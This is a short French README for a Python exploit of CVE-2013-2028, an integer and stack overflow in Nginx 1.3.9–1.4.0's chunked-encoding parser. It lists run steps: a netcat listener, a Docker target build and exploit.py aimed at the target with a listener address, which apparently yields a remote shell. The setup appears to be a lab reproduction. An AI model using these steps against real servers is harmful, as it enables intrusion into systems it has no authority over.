
Exploit python pour CVE-2013-2028
Logiciel vulnérable : Nginx 1.3.9 < 1.4.0
Commit contenant le correctif : https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7
La vulnérabilité se trouve dans la fonction ngx_http_parse_chunked. Cet exploit déclenche un dépassement d'entier dans ngx_http_parse_chunked, puis l'utilise pour déborder la pile et détourner le flux de contrôle.
L'exploit comporte 4 étapes :
nc -lvp 4345sudo docker-compose up --buildpython2 exploit.py -ra 127.0.0.1 -rp 8081 -la <listener machine address> -lp <listener machine port>